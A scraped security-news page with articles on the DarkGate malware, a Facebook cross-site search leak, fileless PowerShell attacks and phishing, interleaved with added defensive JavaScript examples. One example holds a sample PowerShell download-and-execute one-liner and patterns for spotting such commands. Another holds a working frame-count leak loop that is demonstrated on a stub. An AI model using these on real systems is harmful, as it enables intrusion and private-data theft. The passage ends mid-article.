InfoSec Island

'DarkGate' Campaign Targets Europeans with Multiple Payloads

InfoSec Island - 2 hours 46 min ago

A newly discovered malware campaign is targeting users in Europe with various payloads, has a reactive command and control (C&C) system and can remotely control infected machines, enSilo security researchers warn.

Spreading through torrent files, the DarkGate malware evades detection by several anti-virus products and can drop multiple payloads onto infected machines: crypto-currency miners, crypto-coin stealers, and ransomware that encrypts the victim’s files.

The campaign operators hide their C&C infrastructure behind DNS records that resemble those of legitimate services such as Akamai CDN and AWS, which lets them avoid reputation-based detection. The malware can bypass User Account Control (UAC) and is built to resist removal by several known recovery tools.

Mainly focused on targets in Spain and France, the campaign uses a reactive C&C infrastructure, where human operators react to notifications from infected machines. As soon as the malware reports back activity of interest on an infected machine, such as the presence of crypto wallets, the operators install a custom remote access tool for further operations.

The malware author invested a lot of time into ensuring the threat can evade detection by anti-virus products and continues to improve their creation. The operation appears financially motivated, but, given the threat’s ability to install remote access tools, the author might have other motives as well.

The security researchers were able to link DarkGate with the Golroted password stealer: both use Nt* API calls for process hollowing and the SilentCleanup scheduled task for UAC bypass, and there are significant code overlaps between the two.

Distributed via torrent files, the DarkGate malware has a multi-stage unpacking process that starts with an obfuscated VBScript file functioning as a dropper for several files (saved to a hidden folder “C:\{username}”).

The malware uses process hollowing to inject and execute malicious code, but if Kaspersky anti-virus is detected the code is instead loaded as part of the shellcode. The final binary copies all files from “C:\{computer_name}” to a new folder under “C:\ProgramData” and adds a registry key to achieve persistence.

As part of the initial connection made to the C&C server, the malware gets the file necessary to start the cryptocurrency mining process. The malware can also search for and steal credentials for a variety of crypto wallets.

The threat contains six hard coded domains that it attempts to connect to upon infection. It also uses DNS records that are similar to legitimate DNS records from Akamai or Amazon, which allows it to avoid unwanted attention.

The malware includes various anti-VM and user-validation checks, and also looks for a series of anti-virus products (reporting their presence to the server, with the exception of Kaspersky, Trend Micro and IObit) and known recovery tools.

DarkGate, the researchers reveal, uses two distinct UAC bypass techniques in an attempt to elevate its privileges. One abuses a scheduled task for DiskCleanup (cleanmgr.exe), while the other one leverages Event Viewer (eventvwr.exe).
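Both techniques leave a characteristic trace before elevation happens: the eventvwr.exe method writes a per-user `mscfile` handler that Event Viewer's `mmc.exe` will honour, and the SilentCleanup method overrides `%windir%` in the user's own `Environment` key so the scheduled task resolves `%windir%\system32\cleanmgr.exe` to an attacker path. The following is an added example, not code from the enSilo report or the article: detection logic for those traces run over constructed Sysmon-style events (id 13 = registry value set, id 1 = process create). The field names, SIDs, paths and records are all invented for the example.

```javascript
// Constructed sample events, modelled loosely on Sysmon. Every record here
// is invented; none is telemetry from the DarkGate campaign.
const SAMPLE_EVENTS = [
  // eventvwr.exe bypass: HKEY_CLASSES_ROOT merges the user's HKCU\Software\Classes
  // over the machine-wide entries, so a per-user .msc handler wins and
  // eventvwr.exe (auto-elevated) launches whatever it points at.
  { id: 13, image: "C:\\Users\\alice\\AppData\\Roaming\\x.exe",
    target: "HKU\\S-1-5-21-1-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)",
    details: "C:\\Users\\alice\\AppData\\Roaming\\x.exe" },
  // SilentCleanup bypass: the task runs %windir%\system32\cleanmgr.exe with
  // highest privileges and expands %windir% from the user's Environment key.
  { id: 13, image: "C:\\Users\\alice\\AppData\\Roaming\\x.exe",
    target: "HKU\\S-1-5-21-1-1001\\Environment\\windir",
    details: "C:\\Users\\alice\\AppData\\Roaming\\x.exe ;" },
  // Benign per-user environment change: must not alert.
  { id: 13, image: "C:\\Windows\\explorer.exe",
    target: "HKU\\S-1-5-21-1-1001\\Environment\\Path",
    details: "C:\\Users\\alice\\bin" },
  // Normal Event Viewer launch: must not alert.
  { id: 1, image: "C:\\Windows\\System32\\mmc.exe",
    parentImage: "C:\\Windows\\System32\\eventvwr.exe" },
  // Hijacked Event Viewer launch.
  { id: 1, image: "C:\\Users\\alice\\AppData\\Roaming\\x.exe",
    parentImage: "C:\\Windows\\System32\\eventvwr.exe" },
];

const REGISTRY_RULES = [
  [/\\Software\\Classes\\mscfile\\shell\\open\\command/i,
   "eventvwr.exe UAC bypass: per-user mscfile handler set"],
  [/\\Environment\\windir$/i,
   "SilentCleanup UAC bypass: per-user %windir% overridden"],
];

// Only user hives (HKU\<SID>\...) matter: the same paths under HKLM already
// require administrative rights, so writing them is not a bypass.
function checkRegistry(evt) {
  if (!/^HKU\\/i.test(evt.target)) return null;
  for (const [pattern, description] of REGISTRY_RULES) {
    if (pattern.test(evt.target)) return description;
  }
  return null;
}

// eventvwr.exe legitimately spawns only mmc.exe; anything else is the
// hijacked handler being executed.
function checkProcess(evt) {
  const parent = (evt.parentImage || "").toLowerCase();
  const child = (evt.image || "").toLowerCase();
  if (parent.endsWith("\\eventvwr.exe") && !child.endsWith("\\mmc.exe")) {
    return "eventvwr.exe spawned a non-mmc.exe child: " + evt.image;
  }
  return null;
}

function detect(events) {
  const alerts = [];
  for (const evt of events) {
    const reason = evt.id === 13 ? checkRegistry(evt)
                 : evt.id === 1  ? checkProcess(evt)
                 : null;
    if (reason) alerts.push({ reason, image: evt.image });
  }
  return alerts;
}

console.log(detect(SAMPLE_EVENTS));
```

Run against the sample set, `detect` returns three alerts (two registry writes and one suspicious child of eventvwr.exe) and stays quiet on the `Path` change and the normal `mmc.exe` launch. The `windir` rule is deliberately anchored to the value name so that unrelated per-user environment edits do not trigger it.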

The threat can log keystrokes and attempts to steal passwords and browsing data by running the following NirSoft utilities: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView.

DarkGate can delete all restore points on the system, and also appears capable of installing an RDP connection tool, thus providing operators with unfettered access to the infected machine. The server can request various information on the machine, such as locale, username, computer name, processor type, RAM, OS type and version, Epoch time, and installed AV type, among others.

Related: NSA Leak Fuels Rise in Hacking for Crypto Mining: Report

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

Facebook Patches Bug that Exposed Private Information

InfoSec Island - Thu, 11/15/2018 - 1:46pm

Facebook recently addressed a vulnerability that could have allowed anyone to access private information about users and their contacts.

The vulnerability, Imperva security researcher Ron Masas explains, was found in Facebook’s online search function. He discovered that the HTML code for every search result contained an iframe element that could be exploited maliciously.

The issue is that the endpoint, which expects a GET request carrying a number of search parameters, is not protected against cross-site request forgery (CSRF). On its own that is a minor issue: it lets users share a search results page via its URL, and an attacker who forces a victim’s browser to load such a URL cannot read the page that comes back.

In the case of Facebook’s online search, however, the CSRF weakness can be combined with the fact that a few properties of a cross-origin window are exposed to other documents, in particular the number of frames it contains.

An attacker looking to abuse the vulnerability would need to trick a user into opening a malicious website and clicking anywhere on it. The malicious site only needs to run JavaScript.

The click triggers a popup or a new tab pointing at the Facebook search page, and the attacker can make the user’s browser execute any search query they want.

“Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property. By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user,” Masas explains.

The security researcher, who published a proof-of-concept video, notes that he was able to extract a variety of private user data by exploiting the issue.

Such information included details on whether the user had friends from Israel or friends named “Ron,” whether the user had taken photos in certain locations/countries, if they had Islamic friends or Islamic friends living in the UK, and even if the user or their friends wrote a post containing a specific text.

The process, the researcher explains, can be repeated without the need for a new popup or tab, because the attacker retains control of the location property of the Facebook window and can navigate it to the next query with a single line of code.

“This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker’s site,” the security researcher says.
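The leak works because a browser lets a script do very little with a window it opened cross-origin: it may assign `location`, call `postMessage`, `close` or `focus`, and read `closed` and `length` (the frame count, which is what `fb.frames.length` in the quote above reads). Reading anything about the document itself throws a SecurityError. The following is an added example, not Imperva’s proof of concept or Facebook code: the same drive-the-window-and-count loop written against that minimal interface, with an offline stand-in for the handle that `window.open()` returns. The search endpoint, the queries and the result counts are invented for the example.

```javascript
// Offline stand-in for a cross-origin window handle. Only the members a
// browser would let a cross-origin script touch are modelled. The
// URL -> result-count table is constructed; a browser fills it in by
// actually rendering the search page.
class CrossOriginWindowStub {
  constructor(resultsByUrl) {
    this.resultsByUrl = resultsByUrl;
    this.currentUrl = null;
    this.closed = false;
  }
  set location(url) { this.currentUrl = url; }   // navigation is permitted cross-origin
  get length() {                                  // frame count is readable cross-origin
    return this.resultsByUrl[this.currentUrl] || 0;
  }
}

// Hypothetical search endpoint; the real URL shape is not reproduced here.
function searchUrl(query) {
  return "https://search.example/search?q=" + encodeURIComponent(query);
}

// Navigate one handle through a list of queries and record what leaks.
// `settle` is a hook for waiting out navigation: the stub navigates
// synchronously, while a browser would poll until `length` stops changing,
// because it reads as 0 while the new document is still loading.
function probe(handle, queries, settle = () => {}) {
  const leaked = {};
  for (const query of queries) {
    handle.location = searchUrl(query);   // same tab reused, no new popup needed
    settle();
    leaked[query] = handle.length;        // one iframe per result on the page
  }
  return leaked;
}

// The attacker does not need exact counts, only whether a query matched.
function inferFacts(leaked) {
  const facts = {};
  for (const [query, count] of Object.entries(leaked)) facts[query] = count > 0;
  return facts;
}

// Stand-alone run against the stub (in a browser, pass window.open(...) instead).
const demo = new CrossOriginWindowStub({
  [searchUrl("my friends who live in Israel")]: 3,
  [searchUrl("my friends named Ron")]: 0,
});
const demoFacts = inferFacts(probe(demo, [
  "my friends who live in Israel",
  "my friends named Ron",
]));
console.log(demoFacts);
```

The point of the stub is what it leaves out: nothing about the response body is ever read, yet each query still yields one bit (or more, via the count) about the logged-in victim. That is why a GET endpoint that reflects private data in its frame structure needs CSRF protection even though the response itself is unreadable cross-origin.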

The attacker doesn’t even need a Facebook account to extract said information, Imperva told SecurityWeek in an email. The security firm also said that Facebook, which was alerted to the bug in May, issued two bounties (mobile and desktop) for a total of $8,000.

Related: Facebook Says 50M User Accounts Affected by Security Breach

Related: Facebook Asks Big Banks to Share Customer Details


A Human-Centered Approach to Building a Smart, Satisfied Information Security Team

InfoSec Island - Thu, 11/15/2018 - 8:27am

With limited personnel to manage rising risk, the difficulty of attracting, recruiting and retaining an appropriately skilled workforce has itself become a significant risk.

Shortfalls in skills and capabilities are manifesting as major security incidents damage organizational performance and reputation. Building tomorrow’s security workforce is essential to address this challenge and deliver robust and long-term security for organizations in the digital age. Filling the skill shortage will require organizations to change their attitude and approach to hiring, training, and participating in collaborative pipeline development efforts. An overly rigid and traditional approach to identifying candidates, coupled with over-stressed and under-staffed work environments, is clearly in need of new tactics and fresh ideas.

Consider, for example, that new research by Cybersecurity Ventures finds that only 20% of the global cybersecurity workforce is comprised of women. On its face, this statistic suggests that there are large, untapped pools of talent. Looking deeper, there are lessons to be learned about what organizations must do differently to attract bright prospects from a wider spectrum of education, experience, and expertise. And of course, it goes way beyond gender diversity: organizations must figure out how to recruit effectively from younger and older age groups, underprivileged districts, liberal arts colleges, and other atypical populations.

Organizations that fail to adopt a more creative approach will find themselves dangerously shorthanded in the next few years, as both attacks and defensive measures (e.g. security software platforms, patching and configuration practices, analytics, and machine learning) become more complex.

The Evolution of the Security Workforce

The security workforce, typically defined as the personnel responsible for an organization’s information security activities, has evolved rapidly since its inception. The information security function often exists only as part of another associated business function, such as risk, IT operations, legal, or audit. It can be identified as information, cyber, assurance, or operational security. It can also report into various business units, including finance, risk, governance, or IT.

Over the course of its evolution, the lack of a consensus definition of the information security function has allowed numerous, disparate components to form an organization’s security workforce. For example, employees working within threat intelligence, business continuity, and security operations are all essential information security contributors, yet they rarely convene in one distinct function under a designated leader.

Supply and Demand

Closing the gap between supply and demand is imperative for an enterprise to develop an effective security posture. It is evident that individuals with the required skills, qualifications and experience are either unavailable or demanding compensation that cannot be met with existing budgets. Because they are in high demand, talented security staff regularly move to new employers as they seek out better salaries and projects at more prestigious companies.

But is this inevitable? Are hiring managers so inflexible in requiring candidates to have specific skills, qualifications, and years of experience that they end up hindering their security teams? Are uninformed and unimaginative recruitment practices contributing significantly to the perceived shortage? As salaries escalate, organizations are urgently seeking a solution to the perceived crisis around hiring information security professionals.

To address the growing demand, organizations should broaden their approach, and work purposefully to recruit security professionals from a diversity of backgrounds, disciplines and skill sets. Focus on the aptitude and attitude of candidates rather than insisting on a host of specific skills, experience and qualifications that would eliminate a large portion of current and prospective information security professionals.

Human-Centric Security

As vendors and tools saturate the market of security solutions, potential employees have come to perceive information security as deeply technical, leaving recruiters struggling to identify and appeal to candidates with a less traditional mix of education and experience. Organizations are swiftly recognizing that bright, diligent, inquisitive individuals are among the most valuable security assets an enterprise can leverage. A human-centric approach to information security will foster a workforce that is capable of meeting the challenges presented by digital risk.

To help achieve a human-centric approach, the information security function should collaborate with HR and take advantage of well-established HR practices to build a diverse workforce of capable individuals. A human-centric approach supported by HR provides the structure for a strong workplace culture characterized by proficient and satisfied information security professionals.

Building a Sustainable Security Workforce

Increasing reliance on digital systems, coupled with a dynamic threat landscape, has made the security workforce core to an organization’s survival. But for many enterprises, developing a sustainable security workforce is only an aspiration: attracting and retaining experienced, certified security experts is a constant battle.

Organizations need to establish a series of strategic objectives that lay a foundation for a stronger workforce and more robust pipeline. With clear direction and sustained HR efforts, organizations can formalize the structure of the security workforce, harness the appropriate talent, and bring security teams into better alignment with the organization’s security objectives.

As the security workforce matures and finds innovative ways to embrace the vast resources of untapped talent, the exaggerated myth of a looming crisis in the global security workforce will recede. A robust and diverse security workforce will empower organizations to face future workforce challenges, such as automation, role and function amalgamation, and increased outsourcing. ISF Members are already demonstrating success at cultivating teams with the necessary skills and expertise in progressive and engaging environments.

A sustainable security workforce is essential if the information security function is to become a partner to the business and effectively manage the increasing cyber risk and security burden.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.


Addressing the CISO’s Key Challenges in 2018 and Beyond with Endpoint Detection and Response

InfoSec Island - Mon, 11/12/2018 - 10:17am

IT security leaders face more hurdles today than ever. From the growing threat landscape to the increasing regulation of the digital economy, information security officers have their work cut out for them.

Research indicates that CISO responsibilities are growing faster than their ability to address security issues. Some of their biggest troubles include evolving threats, tight budgets, lack of skilled staff, complex environments to protect, and even more complex solutions that do little to ease the IT department’s load. Coupled with the increasing compliance burdens of GDPR and other regulations like it, CISOs need to meet their responsibilities by working smarter, not harder. One such smart approach is leveraging effective Endpoint Detection and Response (EDR).

While there is no shortage of EDR solutions, an evaluation of efficacy among top providers shows that these solutions vary widely. Why? Most EDR solutions are too complex and noisy, trigger too many false alarms (alert fatigue), offer little to no visibility into the detection and remediation process, and/or lack the analytics needed to automate core processes.

An effective EDR solution should reduce alert fatigue by limiting the number of incidents requiring human analysis, enabling IT departments to focus security resources on real threats, and should never overburden staff or infrastructure resources.

Moreover, IT departments need a security solution that is operationally effective. Instead of piling on disparate solutions from different vendors and achieving inferior results, organizations today have access to technologies that give them the option to deploy a single-agent, single-console solution that greatly reduces the effort to install and manage endpoint security.

An integrated, full-spectrum solution

Combating modern threats requires modern weapons. Traditional security solutions are no longer enough—they only display a warning that a threat was blocked, end of story. They offer no visibility into what happened before, during, and after the attack. This lack of insight does little to prepare security teams for similar attacks in the future.

What IT departments need is integrated EDR and EPP (endpoint protection platform), which offers both protection and visibility across all malicious/suspicious activities throughout the infrastructure, as well as alert triage to let them focus on real threats. This integrated solution also offers effective incident response workflows that help reduce resource requirements.

A proper EDR implementation augments protection, detection and response by working together with the security solution in order to provide a complete picture of how threats target organizations, while also allowing IT and security teams to focus on relevant security incidents. At the same time, a successful EDR/EPP implementation eliminates the need for multiple agents, as everything is delivered under a single solution, manageable from a single centralized console. This simplifies deployment and operations across all enterprise endpoints and operating systems, in complex infrastructures both physical and virtual, and across data centers and public cloud environments.

Furthermore, integrated EDR and EPP provides stack and on-execution detection capabilities, which prevent and stop advanced threats from being executed on enterprise infrastructure, while also helping IT and security teams with forensics and investigations into potential security incidents.

The Best of Both Worlds – Security, Visibility

The evolution of cyberattacks has made anomaly detection an imperative and integral part of EDR. Leveraging machine learning, EDR solutions can offer suspicious activity detection that helps with investigation and response, by performing fast security alert triage and focusing on truly relevant security events, usually associated with potential breaches and cyberattacks. Once a potential threat is detected, automatic response kicks in, enabled by the integrated EPP solution: blocking lateral movement, killing suspicious or malicious processes, and automatically remediating any malicious changes performed by the threat. Finally, the pre- and post-compromise forensics offered by EDR capabilities provide visibility into past actions covering the entire lifecycle of the attack and create a full picture of the attacker’s objective.

Keeping imminent cyber threats at bay may sound complicated, but it really boils down to just a few key aspects: reducing the attack surface, automating detection and response, gaining insight to mitigate future threats, and avoiding loss of business by rapidly containing and remediating an attack.

Today more than ever, incident response teams need to be given the tools to analyze and investigate suspicious activities, and adequately respond to evolving threats.

About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.


Fight Fileless Malware on All Fronts

InfoSec Island - Tue, 11/06/2018 - 9:44am

Take a unified approach: patch and protect all elements of your ecosystem to prevent new attacks.

The Ponemon Institute estimates that more than half of all attacks against businesses in 2017 were fileless. Cyber criminals continue to find new, creative ways to disrupt organizations, and a new favorite that gained traction last year is fileless malware. No doubt, 2018 statistics, when compiled, will indicate fileless malware is among the most prevalent attacks as cyber attackers exploit capabilities in Microsoft’s PowerShell, Windows Management Instrumentation (WMI) and the macOS shell.

Cyber Criminals Love Fileless

The recent trend of fileless malware is part of a larger cybercrime story, that of attackers using a variety of scripts to introduce malware or command and control capabilities into an enterprise. PowerShell, for example, is mainly used to automate administration tasks, including managing configurations of systems and servers. It has been abused by scripting malware families like W97/Downloader, Kovter fileless malware, Nemucod and other JavaScript downloaders.

One of the latest examples of fileless malware and script attacks was the heist of close to $1 million from a Russian bank. The cyber criminal group, known as MoneyTaker, is believed to have conducted more than 20 successful attacks on financial institutions and legal firms in Russia, the UK and the U.S. Researchers estimate a total figure of $14 million, from 16 U.S. targets, five Russian banks and one hack of a UK banking-software firm. As reported, the group used widely available tools including PowerShell, Visual Basic and the Metasploit exploit framework, plus their own custom-made fileless malware, to hack into these networks.

Why Fileless Works so Well

Fileless malware has become the darling of cyber criminals because, quite simply, it’s a no-brainer. Rather than wait for some human to open a phishing attachment or a poorly protected application, fileless malware works with what is already in your network, i.e., the day-to-day scripting engines enterprises use, like PowerShell, VBScript or JavaScript. It is easier to conduct an exploit and harder to detect. The malware can be executed entirely from the command line and, with capabilities such as passing Base64-encoded commands (for example through PowerShell’s -EncodedCommand switch), it may be very difficult to see the malware running. Fileless malware typically does not require downloading additional malicious files: the hacker simply executes a command with arguments on the command line. These commands, however, are capable of stealing data and credentials, spying on IT environments, and leaving back doors open to further exploits. Another tactic is to exploit in-memory access and running applications, such as web browsers and Office applications, to conduct malicious behavior.

A fileless infection could be malicious code or data that exists only in memory. It isn’t installed to the target computer’s hard drive. Written directly to RAM, the code is injected into a running process where it can be used for the exploit. And, since it doesn’t exist as a true file, it can often go undetected by antivirus software and intrusion prevention systems. This “zero footprint” intrusion leverages legitimate programs and data to perform desired tasks, while remaining nearly undetectable using traditional detection methods. The infection can remain live until the system is rebooted and the fileless malware is purged from the infected system’s memory, enabling attackers to steal data or download more persistent malware to use in future attacks.
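Because the whole attack can be a single command line, the command line is also where it can be caught. The following is an added example, not the author’s or Ivanti’s code: triage logic that takes constructed process-creation records, unwraps PowerShell’s -EncodedCommand argument (Base64 of a UTF-16LE string, accepted under the abbreviations -e, -ec and -enc as well) and scores the decoded text for the usual download-and-run-in-memory indicators. The records, paths and URL below are invented for the example, and the sample payload is encoded in place so the snippet runs offline.

```javascript
// Matches the -EncodedCommand switch (or its accepted abbreviations)
// followed by a Base64 blob.
const ENCODED_FLAG = /-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i;

// Indicators that, taken together, describe a script fetching and running
// code without ever writing a file to disk.
const INDICATORS = [
  [/\bIEX\b|Invoke-Expression/i,        "invokes an expression built at runtime"],
  [/DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest/i,
                                        "downloads content over HTTP"],
  [/-(?:nop|noprofile)\b/i,             "skips the user profile (-NoProfile)"],
  [/-w(?:indowstyle)?\s+hidden/i,       "hidden window"],
  [/FromBase64String/i,                 "decodes a further Base64 layer"],
  [/\[Reflection\.Assembly\]::Load/i,   "loads an assembly from memory"],
];

// How -EncodedCommand payloads are produced: UTF-16LE text, Base64 encoded.
// Used here only to build the constructed samples below.
function encodeCommand(script) {
  return Buffer.from(script, "utf16le").toString("base64");
}

// Constructed process-creation records (invented; 198.51.100.7 is a
// documentation address).
const SAMPLE_RECORDS = [
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -nop -w hidden -enc " + encodeCommand(
      "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')") },
  // Ordinary administration: one weak indicator, should not be flagged.
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -NoProfile -Command Get-Service -Name Spooler" },
  // Encoded but harmless: encoding alone is not enough to flag.
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -EncodedCommand " + encodeCommand(
      "Get-ChildItem C:\\logs | Measure-Object") },
];

// Return the decoded script if the command line carries an encoded command,
// otherwise the command line itself.
function unwrapCommandLine(cmdline) {
  const m = ENCODED_FLAG.exec(cmdline);
  if (!m) return { encoded: false, script: cmdline };
  return { encoded: true, script: Buffer.from(m[1], "base64").toString("utf16le") };
}

function triage(record) {
  const { encoded, script } = unwrapCommandLine(record.commandLine);
  // Score the outer switches plus the decoded script, with the Base64 blob
  // removed so random blob characters cannot match an indicator.
  const outer = record.commandLine.replace(ENCODED_FLAG, "-EncodedCommand <blob>");
  const text = outer + " " + script;
  const hits = INDICATORS.filter(([re]) => re.test(text)).map(([, why]) => why);
  if (encoded) hits.unshift("Base64-encoded command line");
  // -EncodedCommand is used by legitimate automation too, so require
  // corroborating indicators before calling a record suspicious.
  return { image: record.image, script, hits, suspicious: hits.length >= 2 };
}

console.log(SAMPLE_RECORDS.map(triage));
```

The first record decodes to a download-and-execute one-liner and collects five indicators; the other two collect one each and stay below the threshold. The threshold is the part to tune to your environment: administration frameworks that legitimately use -NoProfile or -EncodedCommand are common, and a rule that fires on either alone produces exactly the alert fatigue the page warns about elsewhere.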

Fighting Back against Fileless

Fileless malware is particularly insidious since traditional antivirus solutions simply aren’t enough of a defense. It has prompted security teams to take a multi-faceted approach to detecting threats and preventing new attacks. ‘Threat hunting’ includes actions such as log analysis of all network devices to detect threat activity like unusual domain name system (DNS) requests or suspicious registry or system file changes; establishing a baseline of approved network traffic; examining behavioral attributes of network users; and understanding baseline endpoint activity of applications and users to detect suspicious activity.

How can fileless malware be avoided? Really, the short answer is, in light of the increasing popularity of these attacks, you need to do it all – to take a unified approach, looking across your enterprise and executing threat-prevention practices wherever possible.

Here are recommended practices for a unified IT approach to fighting back against fileless malware:

  1. Patch Management is critical to preventing attacks of all kinds. Make sure your endpoints and servers are included in the patch cycle to optimize threat protection. And apply those Microsoft patches in a timely fashion! For example, the Microsoft August patch list contained two zero-day vulnerabilities: CVE-2018-8373 [Internet Explorer] and CVE-2018-8414 [Windows Shell]. Given there are known exploits, you should give these fixes top priority.
  2. Advanced Application Control prevents malicious software as well as scripts from executing. By restricting unnecessary scripting languages, you can limit the frameworks that can be used to secretly execute commands on the host system.
  3. Disable Macros and apply memory protection techniques. If you can’t disable macros, consider applying technology to digitally sign macros that are authorized for use by the organization.
  4. Up-to-date Antivirus Technology that monitors behavior at the kernel level gives you the most powerful means of addressing in-memory threats.
  5. Privilege Management is essential to limiting threats by giving users the exact level of rights they need to get their job done, and nothing beyond that. Following strict privilege practices helps ensure user credentials – if compromised – don’t allow cyber criminals access to OS tools that will introduce a fileless infection.
  6. Isolation Policies are also effective against fileless attacks. They can limit the reach of any fileless malware intrusion.
  7. Insight Tools can afford a better view into your most vulnerable systems, using techniques such as Web Application Firewalls (WAFs) to protect potentially exposed systems.
  8. Enforce Policies on removable devices. Locking down user devices, such as flash drives, can further prevent fileless malware exposure.

What’s Next?

“The time it takes cybercriminals to compromise a system is often just a matter of minutes—or even seconds. They don’t need much time to extract valuable data—they usually have much more than they need as it typically takes organizations weeks or months to discover a breach.” A cautionary note from Verizon’s 2018 Data Breach Investigations Report. Verizon reported that 68% of the breaches took months or longer to discover, and to add to the deficit, many breaches are discovered by customers, damaging a company’s brand reputation.

The MoneyTaker group was reported to have spent months investigating a target’s network, in order to elevate system privileges to those of a domain administrator, then to remain active inside the network following the heist.

The message here is: taking a unified approach – enforcing every possible security policy to prevent these attacks and exercising constant vigilance - is the only way to fight back against fileless malware!

About the author: Phil Richards is the Chief Information Security Officer (CISO) for Ivanti. Prior to Ivanti he has held other senior security positions including the Director of Operational Security for Varian Medical Systems, Chief Security Officer for Fundtech Corporation and Business Security Director for Fidelity Investments.


How to Protect SMBs Against Phishing Attacks via Social Engineering

InfoSec Island - Tue, 11/06/2018 - 8:23am

Social engineering and artificial intelligence (AI) are bringing about a new golden age of hacking for criminals. They are capitalizing on common online habits of everyday people to tempt them to click on or install harmful applications – in the guise of browser extensions, clickbait and more – each specifically targeted to the individual user’s online habits using AI.

Most breaches occur when employees make common, seemingly harmless mistakes. Now, this goes beyond forgetting to install updates or using overly simple passwords.  In fact, due in part to the rise of social engineering, employee mistakes account for the vast majority of breaches. Hackers are catching on fast, capitalizing on human nature and using AI and social engineering to target unsuspecting employees. Clickbait isn’t just about articles and pageviews – it’s about getting a backdoor into your network through unsuspecting employees.

These increasingly sophisticated attacks might look like a harmless browser extension or an article in a social media feed. Employees will likely assume they are legitimate (haven’t we all downloaded a music app or other favorite tool?). Unfortunately, behind many of these commonly installed applications lurks a more sinister motive: a hidden phishing mechanism.

Varying Risk Factors

While training may be effective, it is unlikely to stop all employees from unwittingly putting themselves at risk (particularly on their mobile devices over work networks). Small to medium businesses are especially vulnerable when it comes to these highly sophisticated attacks, so what do they need to know to safeguard against these threats?

First, organizations need to understand the types of phishing attacks. Spear phishing, for example, is a phishing attack targeted at specific individuals and can present a substantial risk to organizations. Spear phishing attacks pinpoint persons in the company with access to sensitive and/or valuable data. This could be anyone from a sales executive to an engineer on a specific project to the chief financial officer. While most phishing attacks broadly target employees with the hopes of catching just one, spear phishing is intended to focus on extracting data or credentials from specific individuals. We are seeing this increasingly as hackers become more aware of the value of specific targets and go after them.

Next, organizations need to understand basic prevention techniques. Defending against phishing requires constant training, since humans are the targets, rather than computer systems. Phishing works because someone takes an action to provide access to cybercriminals, unlike other types of attacks. This element of social engineering requires organizations to train employees not once, but on a recurring basis. Many organizations are seeking hands-on training through simulations after finding that prior measures weren’t effective. Training employees how to inspect email header information and identify malicious “spoof” websites can help safeguard organizations against many common threats.
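The header inspection recommended above is mechanical enough to automate as a first-pass check before a message reaches a busy employee. The following is an added example, not code from the article or from Untangle: it unfolds raw RFC 5322 headers, extracts the sender addresses a recipient should compare, and flags the classic spoof signs, namely a From/Return-Path/Reply-To domain mismatch and a failed SPF, DKIM or DMARC verdict in the receiving server’s Authentication-Results header. The message is constructed for the example and uses reserved example domains.

```javascript
// Constructed message: a CEO-fraud style lure whose envelope sender and
// Reply-To point somewhere other than the displayed From domain.
const SAMPLE_HEADERS = [
  "Return-Path: <bounce@mail.attacker.example>",
  "Authentication-Results: mx.corp.example;",
  "  spf=fail smtp.mailfrom=mail.attacker.example;",
  "  dkim=none;",
  "  dmarc=fail header.from=corp.example",
  "From: \"Jane Doe, CFO\" <jane.doe@corp.example>",
  "Reply-To: payments@mail.attacker.example",
  "To: accounts@corp.example",
  "Subject: Urgent wire transfer",
].join("\r\n");

// Unfold continuation lines (leading whitespace) and split into a
// name -> value map; repeated headers are joined with a comma.
function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.replace(/\r\n[ \t]+/g, " ").split("\r\n")) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = headers[name] ? headers[name] + ", " + value : value;
  }
  return headers;
}

// Pull the domain out of "Display Name <user@domain>" or "user@domain".
function domainOf(addr) {
  const m = /<?([^<>\s@]+)@([^<>\s]+)>?\s*$/.exec(addr || "");
  return m ? m[2].toLowerCase() : null;
}

// Read one mechanism's verdict (spf=, dkim=, dmarc=) from Authentication-Results.
function authResult(headers, mechanism) {
  const re = new RegExp("\\b" + mechanism + "=(\\w+)", "i");
  const m = re.exec(headers["authentication-results"] || "");
  return m ? m[1].toLowerCase() : "none";
}

// A subdomain of the From domain (bounce.corp.example) is treated as the
// same organisation; anything else is a mismatch worth a second look.
function sameOrg(domain, fromDomain) {
  return domain === fromDomain || domain.endsWith("." + fromDomain);
}

function inspect(raw) {
  const h = parseHeaders(raw);
  const from = domainOf(h["from"]);
  const findings = [];
  for (const field of ["return-path", "reply-to"]) {
    const d = domainOf(h[field]);
    if (d && from && !sameOrg(d, from)) {
      findings.push(`${field} domain ${d} differs from From domain ${from}`);
    }
  }
  for (const mech of ["spf", "dkim", "dmarc"]) {
    const verdict = authResult(h, mech);
    if (verdict !== "pass") findings.push(`${mech}=${verdict}`);
  }
  return { from, findings, suspicious: findings.length > 0 };
}

console.log(inspect(SAMPLE_HEADERS));
```

On the sample message `inspect` reports five findings: both the envelope sender and the Reply-To live on a different domain from the displayed From address, SPF and DMARC fail, and there is no DKIM signature. Note that the Authentication-Results header is only trustworthy when it was added by your own mail server (the `mx.corp.example` authserv-id here); an attacker can insert a forged one, so production tooling should strip any copy not written by the trusted gateway before evaluating it.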

Mobile Devices in the Workplace

